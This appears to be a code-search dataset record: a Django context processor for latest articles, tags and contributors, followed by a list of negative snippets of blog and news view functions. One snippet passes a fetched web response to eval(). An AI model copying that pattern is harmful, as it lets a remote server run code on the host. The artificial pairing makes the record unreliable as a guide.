    latest_comments = Comment.objects.all().order_by('-pub_date')[:5]
    tags = Tag.objects.annotate(num_articles=Count('article')).order_by(
        '-num_articles')
    contributors = Contributor.objects.annotate(
        num_articles=Count('article')).order_by('-num_articles')
    return {'latest_articles': latest_articles,
            'latest_comments': latest_comments,
            'tags': tags,
            'contributors': contributors,
            }
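A context processor like `latest_content` only takes effect once it is registered with the template engine. The sketch below shows the usual wiring, assuming a hypothetical `blog.context_processors` module path and standard Django template settings; adjust the dotted path to wherever the function actually lives.

```python
# Minimal sketch of registering a context processor such as latest_content.
# "blog.context_processors" is an assumed location used only for illustration.
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "blog.context_processors.latest_content",  # assumed module path
            ],
        },
    },
]
```

With that in place, any template rendered with a `RequestContext` can read the injected variables directly, e.g. `{% for tag in tags %}{{ tag.name }} ({{ tag.num_articles }}){% endfor %}`.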
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def latest_blog_posts(self, request, *args, **kwargs):\n context = self.get_context(request, *args, **kwargs)\n context[\"latest_posts\"] = MyblogDetailPage.objects.live().public()[:1] \n return render(request, \"myblog/latest_posts.html\", context)", "def last_five(request):\n flag_five = True\n topics = (\n request.db[\"topic\"].find().sort([(\"$natural\", -1), (\"topic_date\", -1)]).limit(5)\n )\n\n return render_to_response(\n \"templates/home.html\",\n {\"topics\": topics, \"flag_five\": flag_five, \"count\": count(request)},\n request=request,\n )", "def get_context(self, request):\n articles = self.articles\n\n # Filtering by tag\n tag = request.GET.get('tag')\n if tag:\n articles = articles.filter(tags__name=tag)\n\n # Pagination, using the blog settings\n page = request.GET.get('page')\n page_number = BlogSettings.for_site(request.site).page_number\n paginator = Paginator(articles, page_number)\n try:\n articles = paginator.page(page)\n except PageNotAnInteger:\n articles = paginator.page(1)\n except EmptyPage:\n articles = paginator.page(paginator.num_pages)\n\n # Updating the template context\n context = super(Blog, self).get_context(request)\n context['articles'] = articles\n context['current_tag'] = tag\n return context", "def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n posts = BlogPost.objects.all()\\\n .select_related(\"author\")\\\n .prefetch_related(\"tags\")\\\n .filter(is_published=True)\\\n .order_by('-published_at', 'id')\n\n if 'lastPublished' in self.request.GET:\n last_published = datetime.strptime(self.request.GET['lastPublished'], self.DATE_FORMAT)\n posts = posts.filter(published_at__lt=last_published)\n\n if 'tag_slug' in kwargs:\n posts = posts.filter(tags__slug__in=(kwargs['tag_slug'], ))\n\n if 'author_id' in kwargs:\n posts = posts.filter(author=kwargs['author_id'])\n\n data['has_more'] = posts.count() > 10\n\n posts = list(posts[:10])\n data['last_published'] = min([i.published_at for i in posts]) if posts else None\n data['last_published'] = data['last_published'].strftime(self.DATE_FORMAT) if data['last_published'] else None\n data['posts'] = posts\n\n return data", "def get_recent_posts(self, request, count):\n if request.has_permission('edit'):\n return DBSession.query(Post).filter_by(blog=self).order_by('created desc').slice(0, count).all()\n else:\n return DBSession.query(Post).filter_by(blog=self, published=True).order_by('created desc').slice(0, count).all()", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n all_posts = BlogDetailPage.objects.all().order_by('-first_published_at')\n paginator = Paginator(all_posts, 1)\n page = request.GET.get(\"page\")\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n\n context[\"posts\"] = posts\n context[\"authors\"] = BlogAuthor.objects.all()\n context[\"reverse_url\"] = self.reverse_subpage('latest_posts')\n context[\"categories\"] = BlogCategory.objects.all()\n return context", "def blog(request):\n\tlatest_posts = Post.objects.all().order_by('-created_at')\n\tpopular_posts = Post.objects.all().order_by('-views')[:5]\n\tfor post in latest_posts:\n\t\tpost.url = encode_url(post.title)\n\tfor popular_post in popular_posts:\n\t\tpopular_post.url = encode_url(popular_post.title)\n\treturn render(request, 'blog/blog.html', {'latest_posts': latest_posts, \n\t\t\t\t\t\t\t\t\t\t\t 'popular_posts': 
popular_posts})", "def latest(request):\n post_list = Post.objects.exclude(hidden = True).order_by('-created')\n paginator = Paginator(post_list, 10)\n try:\n page = int(request.GET.get('page', '1'))\n except ValueError:\n page = 1\n try:\n posts = paginator.page(page)\n except EmptyPage, InvalidPage:\n posts = paginator.page(paginator.num_pages)\n return render(request, 'blog/latest.html', {'posts': posts},\n context_instance = RequestContext(request))", "def index(request):\n\n num_posts = BlogPost.objects.all().count()\n num_bloggers = Blogger.objects.all().count()\n latest_blog = BlogPost.objects.latest('post_date')\n\n context = {\n 'num_posts': num_posts,\n 'num_bloggers': num_bloggers,\n 'latest_blog': latest_blog,\n }\n\n return render(request, 'index.html', context=context)", "def index(request, archive=False):\n context = {'archive':archive}\n posts = Post.objects.all()\n if not archive:\n posts = posts[:10]\n context['posts'] = posts\n if request.user.is_authenticated():\n #These are the new news items the logged in user has\n context['new_posts'] = NewBlog.objects.filter(user=request.user)\n return render(request, 'blog/index.html', context)", "def topic_recent(request):\n posts = Post.objects.all().order_by(\"-created\")[:3]\n posts = mk_paginator(request, posts, DJANGO_SIMPLE_FORUM_REPLIES_PER_PAGE)\n # topic = Topic.objects.get(pk=topic_id)\n return render_to_response(\"forum/topic_recent.html\", add_csrf(request, posts=posts), context_instance=RequestContext(request))", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n # Get all posts\n all_posts = BlogPage.objects.live().public() \\\n .order_by(\n '-first_published_at'\n )\n date_sorted_posts = sorted(\n all_posts, key=lambda p: p.specific.date, reverse=True\n )\n # Paginate all posts by 5 per page\n paginator = Paginator(date_sorted_posts, 5)\n # Try to get the ?page=x value\n page = request.GET.get(\"page\")\n try:\n # If the page exists and the ?page=x is an int\n posts = paginator.page(page)\n except PageNotAnInteger:\n # If the ?page=x is not an int; show the first page\n posts = paginator.page(1)\n except EmptyPage:\n # If the ?page=x is out of range (too high most likely)\n # Then return the last page\n posts = paginator.page(paginator.num_pages)\n\n # \"posts\" will have child pages; you'll need to use .specific in the template\n # in order to access child properties, such as youtube_video_id and subtitle\n context[\"posts\"] = posts\n return context", "def top_5_news():\n top_five = []\n\n news = (db.news.find({}).sort([\n ('shares_count', pymongo.DESCENDING),\n ('comments_count', pymongo.DESCENDING),\n ('title', pymongo.ASCENDING)\n ]).limit(5))\n\n for new in news:\n top_five.append((new['title'], new['url']))\n\n return top_five", "def get_recently_articles(cls, num):\n return cls.objects.values('title', 'view_times', 'update_time', 'author')\\\n .filter(status=0).order_by('-update_time')[:num]", "def api_get_threads(request, count):\n\n if PARAMETER_TAG in request.GET:\n tag_name = request.GET[PARAMETER_TAG]\n if tag_name is not None:\n tag = get_object_or_404(Tag, name=tag_name)\n threads = tag.threads.filter(archived=False)\n else: \n threads = Thread.objects.filter(archived=False)\n\n if PARAMETER_OFFSET in request.GET:\n offset = request.GET[PARAMETER_OFFSET]\n offset = int(offset) if offset is not None else 0\n else:\n offset = 0\n\n threads = threads.order_by('-bump_time')\n threads = threads[offset:offset + int(count)]\n\n opening_posts = []\n 
for thread in threads:\n opening_post = thread.get_opening_post()\n\n # TODO Add tags, replies and images count\n opening_posts.append(_get_post_data(opening_post.id,\n include_last_update=True))\n\n return HttpResponse(content=json.dumps(opening_posts))", "def recent(request):\r\n rdict = request.matchdict\r\n params = request.params\r\n\r\n # Make sure we generate a url to feed our rss link.\r\n current_route = request.current_route_url()\r\n\r\n # check for auth related stuff\r\n # are we looking for a specific user\r\n username = rdict.get('username', None)\r\n if username:\r\n username = username.lower()\r\n\r\n # do we have any tags to filter upon\r\n tags = rdict.get('tags', None)\r\n\r\n if isinstance(tags, str):\r\n tags = [tags]\r\n\r\n ret = {\r\n 'username': username,\r\n 'tags': tags,\r\n 'rss_url': current_route.replace('recent', 'rss')\r\n }\r\n\r\n # if we've got url parameters for the page/count then use those to help\r\n # feed the init of the ajax script\r\n ret['count'] = params.get('count') if 'count' in params else RESULTS_MAX\r\n ret['page'] = params.get('page') if 'page' in params else 0\r\n\r\n # Do we have any sorting criteria?\r\n ret['sort'] = params.get('sort') if 'sort' in params else None\r\n\r\n return ret", "def get_recent_posts(self, numposts=10, blogid=1):\n return self.execute('metaWeblog.getRecentPosts', blogid, self.username, self.password, numposts)", "def get_top_articles(\n limit: int = 5,\n date: int = int(datetime.now().strftime(\"%Y%m%d\"))\n):\n\n res = articles_db.get_top_articles_mongo(\n articles,\n limit,\n date\n )\n\n return res", "def get_latest_posts(parser, token):\n\ttry:\n\t\ttag_name, arg = token.contents.split(None, 1)\n\texcept ValueError:\n\t\traise template.TemplateSyntaxError, \"%s tag requires arguments\" % token.contents.split()[0]\n\t\n\tm = re.search(r'(.*?) 
as (\\w+)', arg)\n\t\n\tif not m:\n\t\traise template.TemplateSyntaxError, \"%s tag had invalid arguments\" % tag_name\n\t\n\tformat_string, var_name = m.groups()\n\t\n\treturn LatestPosts(format_string[0], var_name)", "def get_context(self, request, *args, **kwargs):\n\n context = super().get_context(request, *args, **kwargs)\n context['posts'] = BlogDetailPage.objects.live().public()\n return context", "def add_new_posts(last_updated=None):\n for blog in Blog.objects.all():\n try:\n document = feedparser.parse(blog.feed_url)\n except:\n print \"error parsing\"\n continue\n\n if last_updated is None:\n print(\"- Adding %i articles from %s\" % (len(document['entries']), blog.title))\n\n for entry in document['entries']:\n # now we create a new post\n post = Post()\n post.blog = blog\n post.title = entry['title']\n\n if 'summary' in entry:\n post.content = entry['summary']\n if 'content' in entry:\n post.content = entry['content']\n\n post.link = entry['link']\n post.save()\n else:\n # TODO: only parse from a date\n pass", "def GET_front_recent_posts(self, *a, **kw):\r\n # Server side cache is also invalidated when new article is posted\r\n return self.render_cached('recent-promoted', RecentPromotedArticles, g.side_posts_max_age)", "def get_featured_articles(request):\n try:\n count = 1\n if 'count' in request.POST and int(request.POST['count']):\n count = int(request.POST['count'])\n\n newest_list = []\n for article in Article.objects.order_by('-modified')[:count]:\n newest_list.append(article.dump_to_dict())\n\n popular_list = []\n for article in Article.objects.order_by('-views')[:count]:\n popular_list.append(article.dump_to_dict())\n\n return format_ajax_response(True, \"Featured articles retrieved successfully.\", {'newest': newest_list,'popular': popular_list})\n except Exception as ex:\n logger.error(\"Failed to get_featured_articles: %s\" % ex)\n return format_ajax_response(False, \"There was an error retrieving the featured articles.\")", "def sb_related_posts(post, num=5):\n # defer some of the heavier post fields once the defer+annotate bug has been fixed\n posts = Post.objects.published().filter(tag__in=post.tags).exclude(id=post.id).annotate(weight=models.Count('tag')).order_by('-weight', '-date')[:num]\n return dict(blog=Blog.get_active(), posts=posts)", "def BestPosts(request):\r\n \r\n context = {\r\n # Sort by count\r\n 'posts': Post.objects.annotate(count=Count('likes')).order_by('-count')\r\n }\r\n return render(request, 'blog/best_posts.html', context=context)", "def get_popular_articles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_articles = \"\"\"\n SELECT art.title, COUNT(lg.id) as views\n FROM articles as art\n JOIN log as lg\n ON art.slug = substring(lg.path,10)\n AND lg.status = '200 OK'\n GROUP BY art.title\n ORDER BY views desc\n LIMIT 3; \"\"\"\n c.execute(query_popular_articles)\n articles = from_db_cursor(c)\n db.close()\n return articles", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n all_posts = PostPage.objects.live().public().order_by('-first_published_at') \n\n page = request.GET.get(\"page\")\n category = request.GET.get(\"category\")\n if category and BlogCategory.objects.filter(slug=category).exists():\n all_posts = all_posts.filter(categories__slug = category)\n\n paginator = Paginator(all_posts, 9)\n\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n posts = 
paginator.page(paginator.num_pages)\n\n context[\"posts\"] = posts\n context[\"categories\"] = BlogCategory.objects.all() \n\n return context", "def dashboard_content_article_tag_cloud():\n tag_stats = dict()\n past_30 = offset_time_past(30, str=True)\n articles = mongo.db[app.config['ARTICLES_COLLECTION']]\n results = articles.find({'collected': {'$gt': past_30}}, {'_id': 0})\n for result in results:\n for tag in result.get('tags', list()):\n tag_stats[tag] = tag_stats.get(tag, 0) + 1\n tags_sorted = sorted(tag_stats.items(), key=operator.itemgetter(1),\n reverse=True)[:50]\n data = list()\n for item in tags_sorted:\n data.append({'name': item[0], 'weight': item[1]})\n return jsonify(data)", "def three_most_popular_articles():\n\n # To print information\n information_string = '1. The 3 most popular articles of all time are:\\n'\n\n # Query string\n query = \"\"\"select title,count(*) as num from\n articles,log where\n log.path=CONCAT('/article/',articles.slug)\n group by articles.title\n order by num DESC limit 3;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t\"' + str(result[0]) + '\" - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def pull_articles(self, *args, **kwargs):\n tasks.pull_articles()\n return Response({})", "def get_mostViewedArticles():\n\n query = \"\"\"\n SELECT articles.title,COUNT(*) as views\n FROM articles JOIN log\n ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY articles.title\n ORDER BY views DESC\n LIMIT 3\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWhat are the most popular three articles of all time?')\n for title, views in posts:\n print(title + \" - \" + str(views) + \" views\")", "def articles():\n \n # Parse through RSS feed of Get Rich Slowly\n feed = feedparser.parse(\"http://www.getrichslowly.org/blog/feed/\")\n \n # Get current username\n username = get_user()\n \n return render_template(\"articles.html\", username=username, feed=feed)", "def data_for_all(request):\n data = common_data(request)\n data.update({\"tags\": Tag.used_tags(),\n \"archive_qualifier\": \"\",\n \"recent_active_months\": Blog.recent_active_months()})\n return data", "def NewArticle(request):\n category_list = Category.objects.all().order_by('created_time')\n tag_list = Tag.objects.all().order_by('created_time')\n GetWebSiteInfo()\n dic = {'category_list':category_list, 'tag_list': tag_list, 'WebSiteInfo': WebSiteInfo}\n return render(request, \"blog/add_article.html\", dic)", "def get_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\t\ti = random.randint(0, articles.count()-1)\n\t\treturn articles, articles[i]", "def all_blogs(request):\n\n blog = Blog.objects.all()\n sort = None\n direction = None\n\n if request.GET:\n if 'sort' in request.GET:\n sortkey = request.GET['sort']\n sort = sortkey\n\n if 'direction' in request.GET:\n direction = request.GET['direction']\n if direction == 'desc':\n sortkey = f'-{sortkey}'\n blog = blog.order_by(sortkey)\n\n current_sorting = f'{sort}_{direction}'\n\n context = {\n 'blog': blog,\n 'current_sorting': current_sorting,\n }\n\n return render(request, 'blog/blogs.html', context)", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n context[\"posts\"] = MyblogDetailPage.objects.live().public()\n context[\"regular_context_var\"] = \"Hello world 123123\"\n context[\"special_link\"] = self.reverse_subpage('latest_posts')\n 
context[\"categories\"] = MyBlogCategory.objects.all()\n return context", "def recent_ten(request):\n if request.method == 'GET':\n movies = Movie.objects.filter(date_of_release__lte=datetime.date.today())\n movies = movies.order_by('-date_of_release')[:5]\n serializer = MovieSerializer(movies, many=True)\n return Response(serializer.data)", "def index(request):\n\n # Generate counts of some of the main objects\n num_blogs = Blog.objects.all().count()\n num_authors = BlogAuthor.objects.count()\n num_comments = BlogComment.objects.count()\n\n context = {\n 'num_blogs': num_blogs,\n 'num_authors': num_authors,\n 'num_comments': num_comments,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context=context)", "def post_get_recent(requst, limit):\n if requst.method == 'GET':\n recent_posts = Post.objects.order_by('-created_at')[:int(limit)]\n TopicNestedSerializer.Meta.depth = 1\n PostNestedSerializer.Meta.depth = 1\n serializer = PostNestedSerializer(recent_posts, many=True)\n return Response(serializer.data)", "def index(request):\n\n # Generate counts of blog posts and blog authors\n\n num_blogs = Blog.objects.all().count()\n num_authors = BlogAuthor.objects.count()\n\n context = {\n 'num_blogs' : num_blogs,\n 'num_authors' : num_authors,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context = context)", "def get_latest_content():\n\n latest_content = {}\n latest_content['all'] = ContentItem.objects.all().order_by('updated_at')[:4]\n latest_content['ga'] = ContentItem.objects.filter(tags__name='Geeks Abroad').order_by('updated_at')[:4]\n latest_content['gaming'] = ContentItem.objects.filter(tags__name='Gaming').order_by('updated_at')[:4]\n latest_content['osalt'] = ContentItem.objects.filter(tags__name='OS.Alt').order_by('updated_at')[:4]\n latest_content['sqa'] = ContentItem.objects.filter(tags__name='Squirrel Army').order_by('updated_at')[:4]\n\n return latest_content", "def get_blogs(request):\n return get_all_posts(request, PostType.BLOG)", "def blog():\n \n articles = mongo.db.articles.find().sort('date',pymongo.DESCENDING)\n return render_template('pages/blog.html',\n title='Blog', \n articles=articles,\n legend='Read the latest articles'\n )", "def create_pagination(request, user=None):\n if user:\n posts = Post.objects.filter(author=user).order_by(\"-timestamp\")\n else:\n posts = Post.objects.all().order_by(\"-timestamp\")\n paginator = Paginator(posts, 5)\n current_page = request.GET.get(\"page\", 1)\n page_obj = paginator.get_page(current_page)\n context = {\"page_obj\": page_obj}\n if request.user.is_authenticated:\n liked_posts = request.user.liked_posts.all()\n context.update({\"liked_posts\": liked_posts})\n return context", "def listLastPosts(self, number):\n\n try :\n entries = self.server.mt.getRecentPostTitles(\n self.blogid, self.username,\n self.password, number)\n\n for e in entries :\n if (\"categories\" in e) :\n category = e['categories'][0]\n else :\n category = 'nil'\n print \"{0} :: {1} in cat. 
{2} (tags: {3})\".format(\n e['postid'],\n e['title'],\n category,\n e['mt_keywords'])\n\n except xmlrpclib.Fault as fault:\n display_XMLRPC_errors(\"get list of recent posts\", fault)\n\n print # add a blank line", "def entries_index(request):\n blog_entries = Entry.objects.filter(status=2).order_by('-pub_date')\n paginator = Paginator(blog_entries, 4)#4 posts/page\n try:\n page = int(request.GET.get('page','1'))\n except ValueError:\n page = 1\n try:\n entries = paginator.page(page)\n except (EmptyPage, InvalidPage):\n entries = paginator.page(paginator.num_pages)\n return render_to_response('blog/blog.html', {'entries':entries}, RequestContext(request))", "def index():\n page = request.args.get(get_page_parameter(), type=int, default=1)\n limit = 5\n\n entries = db.session.query(Entry).\\\n order_by(desc(Entry.created)).\\\n all()\n pagination = Pagination(\n page=page,\n per_page=limit,\n total=len(entries),\n record_name='entries',\n css_framework='bootstrap5'\n )\n entries_showed = entries[(page - 1) * limit: page * limit]\n\n return render_template(\n 'blog/index.html', entries=entries_showed,\n pagination=pagination\n )", "def get_queryset(self):\n return Post.objects.order_by('-posted')[:5]", "def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n context[\"page_title\"] = self.title\n\n categories = NewsCategory.objects.all().order_by(\"category\")\n context[\"categories\"] = categories\n\n # Check for category\n if \"category\" in kwargs:\n category = NewsCategory.objects.filter(\n slug=kwargs[\"category\"],\n ).first()\n news_items = (\n NewsPage.objects.filter(\n news_categories__news_category_id__in=[\n category.pk,\n ],\n )\n .live()\n .public()\n .order_by(\n \"-pinned_on_home\",\n \"home_news_order_pages__order\",\n \"-first_published_at\",\n )\n )\n\n if category.lead_story:\n news_items = news_items.exclude(\n pk=category.lead_story.pk,\n )\n\n context[\"category\"] = category\n else:\n # Get all posts\n news_items = (\n NewsPage.objects.live()\n .public()\n .order_by(\n \"-pinned_on_home\",\n \"home_news_order_pages__order\",\n \"-first_published_at\",\n )\n )\n\n featured_page = NewsPage.objects.filter(\n featured_on_news_home=True,\n ).first()\n\n if featured_page:\n news_items = news_items.exclude(\n pk=featured_page.pk,\n )\n\n # Paginate all posts by 2 per page\n paginator = Paginator(news_items, 9)\n # Try to get the ?page=x value\n page = int(request.GET.get(\"page\", 1))\n\n try:\n # If the page exists and the ?page=x is an int\n posts = paginator.page(page)\n except EmptyPage:\n # If the ?page=x is out of range (too high most likely)\n # Then return the last page\n posts = paginator.page(paginator.num_pages)\n\n start = 1\n total_shown = 10\n\n if paginator.num_pages < total_shown:\n total_shown = paginator.num_pages\n\n if page > 9:\n start = page - 7\n total_shown = 10\n\n if (page + 2) > paginator.num_pages:\n start = paginator.num_pages - 9\n\n context[\"pagination_range\"] = range(start, (start + total_shown))\n\n # \"posts\" will have child pages; you'll need to use .specific in the templates\n # in order to access child properties, such as youtube_video_id and subtitle\n context[\"posts\"] = posts\n\n return context", "def show_archives():\n if not session.get('logged_in'): \n latest = Post.query.filter_by(visible=True)\n else:\n latest = Post.query\n latest = latest.order_by(Post.id.desc()).limit(10)\n months = Post.query.get_months()\n tags = Tag.query.order_by(Tag.name).all()\n #: Needed for 
calculation of tag cloud\n max_count = Tag.query.get_maxcount()\n categories = sorted(Category.query.all(), key=lambda x: -x.post_count)\n uncategorized_count = Post.query.filter(Post.categories==None).count()\n return render_template('archives.html', latest=latest, tags=tags,\n categories=categories, uncategorized_count=uncategorized_count, \n months=months, max_count=max_count)", "def get_top_articles(update=False):\n # use caching to avoid running unnecessary DB queries at each page load\n key = 'top_ten'\n articles = memcache.get(key)\n\n logging.warn('MEMCACHE | Wiki articles %s' % str(articles))\n\n if (articles is None) or (len(articles) == 0) or update:\n # necessary artificial delay when a new article has just been persisted to the datastore\n if update:\n time.sleep(2)\n\n articles = db.GqlQuery('SELECT * FROM Article ORDER BY updated DESC LIMIT 10')\n articles = list(articles)\n memcache.set(key, articles)\n\n logging.warn('DATASTORE | Wiki articles count %s' % str(len(articles)))\n return articles", "def get_most_popular_articles():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\"select t2.title, count(*) as total from log as t1,articles as t2 where t1.path=concat('/article/',t2.slug) group by t2.title order by total desc limit 3 ;\")\n\tdata = c.fetchall()\n\tdb.close()\n\treturn data", "def new_posts(self, number_posts=5) -> Type[QuerySet]:\n return self.published_posts()[:number_posts]", "def last_topic_list(request):\n\ttopics = Topic.objects.order_by('-topic_modification_date')[:50]\n\tfor i in topics:\n\t\tpmax = i.post_set.all().count()/10\n\t\tpmaxten = i.post_set.all().count()%10\n\t\tif pmaxten != 0:\n\t\t\ti.pagination_max = pmax+1\n\t\telse:\n\t\t\ti.pagination_max = pmax\n\tforum_name = _('Last Active Topics')\n\treturn render_to_response(\n\t\t'myghtyboard/mytopics_list.html',\n\t\t{'topics': topics, 'forum_name': forum_name, 'perms': list_perms(request)},\n\t\tcontext_instance=RequestContext(request))", "def most_popular_articles():\n\n results = query_database(QUERIES[0])\n print('\\nWhat are the most popular three articles of all time?\\n')\n for title, views in results:\n print(' * \"{}\" -- {} views'.format(title, views))", "def json_posts_latest():\n posts = posts_base.order_by(Post.pubdate.desc())[:app.config['FEEDITEMS']]\n out = {'posts': []}\n for post_result in posts:\n post_dict = get_public_post_dict(post_result[0], post_result[2])\n out['posts'].append(post_dict)\n\n return jsonify(out)", "def article_list(request):\n try:\n logger.info('Calling the api' + APIURL + '/articles/?format=json&limit=' + str(COUNT))\n response = requests.get(APIURL + '/articles/?format=json&limit=' + str(COUNT))\n parser = json.loads(response.content)\n preview_article = random_article(parser)\n next_read = read_next()\n return render(request, 'article/article_list.html', {'articlelist':parser, 'preview_article': preview_article, 'next_read': next_read})\n except:\n logger.error('Calling the api error in article_list')\n raise Http404(\"Article does not exist\")", "def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n post = get_object_or_404(BlogPost, url=kwargs['slug'])\n\n if not self.request.user.is_authenticated:\n BlogPost.objects.filter(pk=post.pk).update(\n views_count=F('views_count') + 1,\n real_views_count=F('real_views_count') + 1\n )\n\n data['post'] = post\n return data", "def super_more_posts(request, agent):\n if request.is_ajax():\n view_objects = {}\n view_objects[\"wallpost__\" + agent + 
\"_wallpost\"] = super_supply(\n request,\n request.GET[\"page_name\"],\n agent\n )\n template = render_to_string(agent + \"_news_posts.html\", {\n \"view_objects\": view_objects,\n }, context_instance=RequestContext(request))\n\n return HttpResponse(json.dumps({\n \"contents\": template,\n }), mimetype='application/json')\n\n raise Http404", "def edit_top():\n page = request.args.get(get_page_parameter(), type=int, default=1)\n limit = 5\n\n entries = db.session.query(\n Entry.id, Entry.title, Entry.created, Entry.author_id, User.name).\\\n outerjoin(User, Entry.author_id == User.id).\\\n order_by(desc(Entry.created)).\\\n all()\n pagination = Pagination(\n page=page,\n per_page=limit,\n total=len(entries),\n record_name='entries',\n css_framework='bootstrap5'\n )\n entries_showed = entries[(page - 1) * limit: page * limit]\n\n can_update_all_enrty = False\n if ROLE_PRIV[g.user.role] >= Privilege.EDITOR:\n can_update_all_enrty = True\n\n return render_template(\n 'blog/edit_top.html', entries=entries_showed,\n pagination=pagination,\n can_update_all_enrty=can_update_all_enrty\n )", "def rss(request, blog):\n\tblog = Blog.objects.get(urlname=blog)\n\tarticles = BlogEntry.objects.filter(blog=blog).order_by('-posting_time')[:RSS_COUNT]\n\treturn render_to_response('rss/blog.html', {'blog': blog, 'articles': articles}, context_instance=RequestContext(request))", "def GET_side_posts(self, *a, **kw):\r\n # Server side cache is also invalidated when new article is posted\r\n return self.render_cached('side-posts', RecentArticles, g.side_posts_max_age)", "def bmark_recent(request, with_content=False):\r\n rdict = request.matchdict\r\n params = request.params\r\n\r\n # check if we have a page count submitted\r\n page = int(params.get('page', '0'))\r\n count = int(params.get('count', RESULTS_MAX))\r\n\r\n # we only want to do the username if the username is in the url\r\n username = rdict.get('username', None)\r\n if username:\r\n username = username.lower()\r\n\r\n # We need to check if we have an ordering crtieria specified.\r\n order_by = params.get('sort', None)\r\n if order_by == \"popular\":\r\n if username:\r\n order_by = Bmark.clicks.desc()\r\n else:\r\n order_by = Hashed.clicks.desc()\r\n\r\n else:\r\n order_by = Bmark.stored.desc()\r\n\r\n # thou shalt not have more then the HARD MAX\r\n # @todo move this to the .ini as a setting\r\n if count > HARD_MAX:\r\n count = HARD_MAX\r\n\r\n # do we have any tags to filter upon\r\n tags = rdict.get('tags', None)\r\n\r\n if isinstance(tags, str):\r\n tags = [tags]\r\n\r\n # if we don't have tags, we might have them sent by a non-js browser as a\r\n # string in a query string\r\n if not tags and 'tag_filter' in params:\r\n tags = params.get('tag_filter').split()\r\n\r\n # @todo fix this!\r\n # if we allow showing of content the query hangs and fails on the\r\n # postgres side. 
Need to check the query and figure out what's up.\r\n # see bug #142\r\n # We don't allow with_content by default because of this bug.\r\n recent_list = BmarkMgr.find(\r\n limit=count,\r\n order_by=order_by,\r\n page=page,\r\n tags=tags,\r\n username=username,\r\n with_tags=True,\r\n )\r\n\r\n result_set = []\r\n\r\n for res in recent_list:\r\n return_obj = dict(res)\r\n return_obj['tags'] = [dict(tag[1]) for tag in res.tags.items()]\r\n\r\n # we should have the hashed information, we need the url and clicks as\r\n # total clicks to send back\r\n return_obj['url'] = res.hashed.url\r\n return_obj['total_clicks'] = res.hashed.clicks\r\n\r\n if with_content:\r\n return_obj['readable'] = dict(res.readable) if res.readable else {}\r\n\r\n result_set.append(return_obj)\r\n\r\n return _api_response(request, {\r\n 'bmarks': result_set,\r\n 'max_count': RESULTS_MAX,\r\n 'count': len(recent_list),\r\n 'page': page,\r\n 'tag_filter': tags,\r\n })", "def top_articles_by_views(articles, top_x):\n p = PageviewsClient()\n\n # create date string based on previous month\n now = datetime.datetime.now()\n previous_month = str(now.month - 1).zfill(2)\n if previous_month == \"00\": previous_month = \"12\"\n start_date = str(now.year) + previous_month + \"0100\"\n end_date = str(now.year) + previous_month + \"2800\"\n\n # get views\n result = p.article_views('en.wikipedia', articles, \n granularity='monthly', start=start_date, end=end_date)\n # clean results (six is used for backwards compatibility with python 2\n result = six.next(six.itervalues(result))\n sorted_articles = sorted(result.items(), \n key=operator.itemgetter(1), reverse=True)\n return sorted_articles[:top_x]", "def NewsArticles():\n health_articles = get_articles('health')\n education_articles = get_articles('technology')\n return render_template('articles.html',health=health_articles, tech =education_articles)", "def get_queryset(self):\n return Article.objects.filter(\n pub_date__lte=timezone.now()\n ).order_by('-pub_date')[:5]", "def education_post_list(request):\n posts = EducationBlogPost.objects.filter(published_date__lte=timezone.now()\n ).order_by('-published_date')\n return render(request, \"education_center/education_blogposts.html\", {'posts': posts})", "def index(request):\n num_blogs = Blog.objects.all().count()\n num_authors = BlogAuthor.objects.all().count()\n num_unique_authors = Blog.objects.distinct().count()\n num_comments = Comment.objects.all().count()\n return render(request, 'index.html', context={'num_blogs' : num_blogs, 'num_authors' : num_authors,\n 'num_unique_authors' : num_unique_authors, 'num_comments' : num_comments})", "def index(request):\n\n # Generate counts of some of the main objects\n num_posts = Post.objects.all().count()\n num_category = Category.objects.all().count()\n \n # The 'all()' is implied by default. 
\n num_authors = Author.objects.count()\n \n context = {\n 'num_posts': num_posts,\n 'num_category': num_category,\n 'num_authors': num_authors,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context=context)", "def _fetch_latest_for_tag(self, tag, today):\n result = []\n url = Fetch163.search_link % urllib2.quote(tag.name.encode('utf8'))\n try:\n resp = urllib2.urlopen(url)\n except urllib2.URLError as e:\n urllib_error(e)\n else:\n doc = eval(resp.read())\n if doc and type(doc) is list:\n if today:\n news_today = self._today_filter(doc, delta=2)\n else:\n news_today = doc\n for d in news_today:\n docid = d.get('docid', '')\n #title = u'%s' % d.get('title', '')\n # the d.get('title') is a unicode string represent by\n # python str, so use unicode-escape to decode it.\n title = d.get('title', '')\n #print type(title)\n news_title = self._trans_title(title)\n if docid and title:\n news_exits = News.objects.filter(\n Q(docid=docid) | Q(title=news_title)\n )\n #print docid, news_title, news_exits\n intro, body, c_num, ptime, pic = self._fetch_news(docid)\n if not news_exits:\n print 'new news', news_title, 